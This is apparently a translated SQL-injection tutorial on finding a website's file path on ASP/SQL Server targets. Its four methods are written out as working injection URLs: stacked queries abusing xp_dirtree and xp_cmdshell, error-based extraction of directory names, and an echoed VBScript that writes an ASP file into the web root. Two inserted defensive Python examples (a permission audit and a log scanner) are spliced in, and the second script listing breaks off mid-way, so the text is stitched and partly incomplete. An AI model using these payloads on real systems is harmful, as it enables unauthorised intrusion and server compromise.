Obtain the website path through SQL Injection

Source: Internet
Author: User

If the target website exposes only port 80, you will find the following methods more useful.
I have found hardly any of these methods described elsewhere; they come from my own injection experience and tricks.
There are four methods (currently known).

Method 1:

This is the method described in <weird SQL Injection>.
It relies on SQL Server's xp_dirtree extended stored procedure. Let's look at the steps first and then talk about the advantages and disadvantages (based on the original article).

Create a table

Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Return: the normal page. The table was created successfully! Continue!
(This differs slightly from the original: I dropped the id column because it is useless, and allowed a longer name.)

Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:'--
Return: the normal page, which means every directory on drive C has been written into the table! Great! The next step is to read the table back, which seems to be the only way to get at the result.

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '@Inetpub' to a column of data type int.

The error message reveals the first directory name stored in the table!

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'test' to a column of data type int.

The next directory name in the table is revealed!
Okay. Let's continue.

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub','test'))--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'haha' to a column of data type int.

The next directory name in the table is revealed!

By now you should see how it works: each time, add the name you just obtained to the list inside the brackets and submit again.

TIPS:

Sometimes you will find that when you submit something like

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--

no error is shown and the page renders normally.
Dizzy? Don't be nervous.
If 0<>(select top 1 paths from dirs) causes no error, the value being returned converts to a number,
so, haha, test what number it is.

100>(select top 1 paths from dirs)

Returns the normal page.
Haha, with greater-than and less-than comparisons like this you can quickly narrow the number down.
Okay. Let's continue.
For example

59=(select top 1 paths from dirs)

Returns the normal page,
so the name is 59.
Now enter the following

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('59'))--

Remember the quotation marks around the name.
From here on the method is the same as the original.
One more problem:
sometimes after excluding 59 as above, I find that the next folder still comes out as 59.
How can that be?
Have you noticed that 059 and 59 compare as equal numbers?
That is the reason, haha. So use

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('059'))--

and the name of the next folder appears. OK.

Advantages and disadvantages:

The advantage is that every SQL Server login can use it, because EXECUTE on xp_dirtree is granted to PUBLIC.
The disadvantage is that the names of all folders under the starting directory are dumped together, apparently in no particular order. In short, it is painful to find the folder you want among thousands or tens of thousands of entries,
and there is no guarantee that the web folder is even under the root directory you started from. It really is painful; success often depends on luck and endurance.
Wish you success.

Method 2:

Use xp_cmdshell

Haha, you must be familiar with this one, so I will only introduce it briefly.

Create a table

Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Return: the normal page. The table was created successfully! Continue!
(This differs slightly from the original: I dropped the id column because it is useless, and allowed a longer name.)

Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'dir c:\ /B /D'--
Return: the normal page, which means the directories on drive C have been written into the table! Note that dir c:\ /B /D is used here. Haha, if you don't know what /B and /D do, try them.

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '@Inetpub' to a column of data type int.

The error message reveals the first directory name stored in the table!

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'test' to a column of data type int.

The next directory name in the table is revealed!

The rest is the same as above.

Sometimes we can also use the following two extended procedures.

1) xp_availablemedia lists all current drives; we can store them in the dirs table:

5;insert dirs exec master.dbo.xp_availablemedia;--

Querying the table's contents then gives the drive list and related information.

2) xp_subdirs lists the subdirectories of a given directory; we can store them in the dirs table:

5;insert into dirs exec master.dbo.xp_subdirs 'c:';--

Advantages and disadvantages:

Obviously, unlike xp_dirtree, this does not dump every directory at every depth into one pile: only the first-level directories are listed, which makes them much easier to search.
The disadvantage is equally obvious: only sa has this permission, and the administrator may have removed the extended procedure altogether (after all, it is too powerful).
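Added example (not from the original article or its author): a small Python audit of the three SQL Server conditions Methods 1 and 2 depend on, namely xp_cmdshell being enabled, EXECUTE on the directory-listing extended procedures being granted to public, and the web application's login being a sysadmin member. It is written in Python because that is what a defender would run over exported catalog rows, not anything the article uses. The catalog queries in the docstring are real SQL Server 2005+ views; every row, login name and value under SAMPLE_* is constructed sample data, not real output.

```python
"""Least-privilege audit of the SQL Server surface the article relies on.

Added example, not code from the original article. It consumes rows that an
administrator would fetch in the master database (SQL Server 2005 or later) with:

    SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

    SELECT OBJECT_NAME(major_id) AS proc_name, USER_NAME(grantee_principal_id) AS grantee,
           permission_name, state_desc
      FROM sys.database_permissions WHERE class = 1;

    SELECT name, IS_SRVROLEMEMBER('sysadmin', name) AS is_sysadmin
      FROM sys.server_principals WHERE type IN ('S', 'U');

Everything under SAMPLE_* below is constructed data, not real output.
"""
from dataclasses import dataclass

# Extended procedures the article uses to enumerate drives, directories and files.
FILESYSTEM_XPS = {"xp_dirtree", "xp_subdirs", "xp_availablemedia", "xp_cmdshell"}


@dataclass(frozen=True)
class Finding:
    kind: str      # "config", "permission" or "role"
    severity: str
    subject: str   # configuration name, procedure name or login name
    detail: str


def audit(configurations, permissions, principals, app_logins):
    """Return Findings for the conditions each method depends on.

    configurations: {option name: value_in_use}
    permissions:    iterable of (proc_name, grantee, permission_name, state_desc)
    principals:     {login name: is_sysadmin as 0/1}
    app_logins:     set of login names the web application connects as
    """
    findings = []
    # Methods 2 and 3 need xp_cmdshell; it is off by default on SQL Server 2005+.
    if configurations.get("xp_cmdshell", 0):
        findings.append(Finding("config", "high", "xp_cmdshell",
                                "xp_cmdshell is enabled in sys.configurations"))
    # Method 1 works for every login because EXECUTE on xp_dirtree is granted to public.
    for proc, grantee, perm, state in permissions:
        if (proc.lower() in FILESYSTEM_XPS and grantee.lower() == "public"
                and perm.upper() == "EXECUTE" and state.upper() == "GRANT"):
            findings.append(Finding("permission", "medium", proc.lower(),
                                    "EXECUTE granted to public; any login can call it"))
    # An application login in sysadmin turns any injection into a full server compromise.
    for login in sorted(app_logins):
        if principals.get(login):
            findings.append(Finding("role", "high", login,
                                    "web application login is a member of sysadmin"))
    return findings


def remediation(findings):
    """T-SQL an administrator would run in master to close each finding.

    ALTER SERVER ROLE needs SQL Server 2012 or later; older versions use
    sp_dropsrvrolemember instead.
    """
    statements = []
    for f in findings:
        if f.kind == "config":
            statements.append("EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;")
        elif f.kind == "permission":
            statements.append(f"REVOKE EXECUTE ON dbo.{f.subject} FROM public;")
        elif f.kind == "role":
            statements.append(f"ALTER SERVER ROLE sysadmin DROP MEMBER [{f.subject}];")
    return statements


# Constructed sample rows, shaped like the catalog query results above.
SAMPLE_CONFIGURATIONS = {"xp_cmdshell": 1}
SAMPLE_PERMISSIONS = [
    ("xp_dirtree", "public", "EXECUTE", "GRANT"),
    ("xp_subdirs", "public", "EXECUTE", "GRANT"),
    ("xp_cmdshell", "public", "EXECUTE", "DENY"),   # denied, so not reported
]
SAMPLE_PRINCIPALS = {"sa": 1, "webapp": 1, "reporting": 0}
SAMPLE_APP_LOGINS = {"webapp"}


def run_sample():
    """Audit the constructed sample and return (findings, remediation statements)."""
    found = audit(SAMPLE_CONFIGURATIONS, SAMPLE_PERMISSIONS, SAMPLE_PRINCIPALS, SAMPLE_APP_LOGINS)
    return found, remediation(found)


if __name__ == "__main__":
    found, fixes = run_sample()
    for f in found:
        print(f"[{f.severity}] {f.subject}: {f.detail}")
    print("\n".join(fixes))
```

The REVOKE statements must be run in master, where the extended procedures live; the audit deliberately ignores rows whose state is DENY or whose grantee is not public, so that an explicit deny on xp_cmdshell is not reported as a problem.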

Method 3:

This method is good.
Below is the original text:
I thought of using the adsutil.vbs program.

a;exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/1/root > a.txt';--

Is it too long? With this, the settings of the first virtual web site in IIS (including the actual directory it lives in)
are exported to a.txt.
By default a.txt lands in c:\winnt\system32. That in itself is not a problem, but if the administrator has deleted adsutil.vbs
or moved it somewhere else,
we can do nothing about it (it is impossible to write one with the echo command).

Step 2: Use the echo command to write the following code into c:\read.vbs. It is a lot, isn't it?

...xp_cmdshell 'echo Set fso1 = CreateObject("Scripting.FileSystemObject") > c:\read.vbs';--
...xp_cmdshell 'echo Set WshShell = WScript.CreateObject("WScript.Shell") >> c:\read.vbs';--
.....
----------------- read.vbs ---------------------------------
Set fso1 = CreateObject("Scripting.FileSystemObject")
Set WshShell = WScript.CreateObject("WScript.Shell")
' %windir%, normally c:\winnt, is where the adsutil output was saved
spa = WshShell.Environment("process")("windir")
Set fil = fso1.OpenTextFile(spa & "\system32\aa.txt")
' find the "Path" line of the adsutil output and take the value between the quotes
Do While Not fil.AtEndOfStream
    nr = fil.ReadLine
    If Left(nr, 4) = "Path" Then
        pa = Mid(nr, InStr(nr, ")") + 3, Len(nr) - InStr(nr, ")") - 3)
        Exit Do
    End If
Loop
' open (2 = ForWriting, True = create) a new file in the web root
Set fil1 = fso1.OpenTextFile(pa & "\dd.asp", 2, True)
fil1.WriteLine ""
--------------- Cut here -------------------------------------

Step 3: Of course, execute read.vbs. It reads the content of aa.txt to find the actual path of the web site,
then writes a file named dd.asp into the root directory of the web site. If it succeeds, you will know:
Run http://x.x.x.x/dd.asp
Return: xxx
Haha, it is indeed a good method.
However, the original seems to have a problem.
Yes:

Set fil = fso1.OpenTextFile(spa %2B "\system32\aa.txt")
Set fil1 = fso1.OpenTextFile(pa %2B "\dd.asp", 2, True)

Submitting those two statements as originally written causes an error,
so we thought of the plus sign, which does the same job as & (and is submitted URL-encoded as %2B).
What else should be written into dd.asp? Write pa, haha.
Haha, here is the changed version:

----------------- read.vbs ---------------------------------
Set fso1 = CreateObject("Scripting.FileSystemObject")
Set WshShell = WScript.CreateObject("WScript.Shell")
spa = WshShell.Environment("process")("windir")
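Added example (not part of the original article): a Python scanner for IIS W3C log lines that URL-decodes cs-uri-query and flags the four traces the three methods above leave in the web server log: a stacked statement after the id value, the xp_ directory-listing and shell procedures, the error-based and numeric-comparison extraction from Method 1 and its TIPS (0<>(select top 1 ... and 100>(select top 1 ...), and the cscript/echo redirects of Method 3. Python is used because this runs on the defender's side, not in the ASP application. The dates, addresses and status codes in SAMPLE_LOG are constructed; only the query strings reproduce payloads shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not a real capture). The query strings
# reproduce the article's payloads; dates, addresses and statuses are invented.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 198.51.100.7 GET /down/list.asp id=1 200
2004-05-01 10:00:05 198.51.100.7 GET /down/list.asp id=1;create%20table%20dirs(paths%20varchar(1000))-- 200
2004-05-01 10:00:09 198.51.100.7 GET /down/list.asp id=1;insert%20dirs%20exec%20master.dbo.xp_dirtree%20%27c:%27-- 200
2004-05-01 10:00:14 198.51.100.7 GET /down/list.asp id=1%20and%200%3C%3E(select%20top%201%20paths%20from%20dirs)-- 500
2004-05-01 10:00:20 198.51.100.7 GET /down/list.asp id=1%20and%20100%3E(select%20top%201%20paths%20from%20dirs)-- 200
2004-05-01 10:01:02 198.51.100.7 GET /down/list.asp id=1;exec%20master..xp_cmdshell%20%27cmd%20/c%20cscript%20c:%5Cinetpub%5Cadminscripts%5Cadsutil.vbs%20enum%20w3svc/1/root%20%3E%20a.txt%27;-- 200
2004-05-01 10:02:00 203.0.113.9 GET /down/list.asp id=59 200
"""

# Signatures of the techniques described in the article; keys are the tags
# reported per log line.
PATTERNS = {
    # a second statement after the numeric id: create/insert/exec ...
    "stacked-query": re.compile(r";\s*(?:create|insert|exec(?:ute)?|drop|update|delete)\b"),
    # extended procedures used to list drives, directories or run commands
    "extended-proc": re.compile(r"\bxp_(?:dirtree|cmdshell|subdirs|availablemedia)\b"),
    # error-based extraction and the numeric guessing variant from the TIPS
    "error-based-extract": re.compile(r"\b\d+\s*(?:<>|<=|>=|=|<|>)\s*\(\s*select\s+top\s+1\b"),
    # Method 3: cscript / echo with output redirected into a file
    "shell-file-write": re.compile(r"\b(?:cscript|echo)\b.*>"),
}


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header.

    IIS percent-encodes spaces inside cs-uri-query, so splitting on whitespace
    is safe for the standard W3C fields.
    """
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        yield dict(zip(fields, raw.split()))


def classify_query(query):
    """Return the set of pattern names matching a raw (still encoded) query string."""
    decoded = unquote_plus(query).lower()      # %20 -> space, %3C%3E -> <>
    decoded = re.sub(r"\s+", " ", decoded)     # normalise whitespace variants
    return {name for name, rx in PATTERNS.items() if rx.search(decoded)}


def scan(text):
    """Return [(c-ip, cs-uri-stem, sorted tags)] for every line that hits a pattern."""
    hits = []
    for rec in parse_w3c(text):
        tags = classify_query(rec.get("cs-uri-query", "-"))
        if tags:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], sorted(tags)))
    return hits


def suspects(hits, threshold=2):
    """Client addresses with at least `threshold` flagged requests.

    The enumeration loop in the article needs one request per directory, so a
    single hit may be noise but a run of them is an injection session.
    """
    counts = {}
    for ip, _stem, _tags in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, stem, tags in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(tags))
    print("suspect clients:", suspects(scan(SAMPLE_LOG)))
```

The patterns are matched after decoding and whitespace normalisation, so %20, + and tab variants of the same payload are treated alike; a real deployment would add the same check on POST bodies, which IIS does not log by default.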
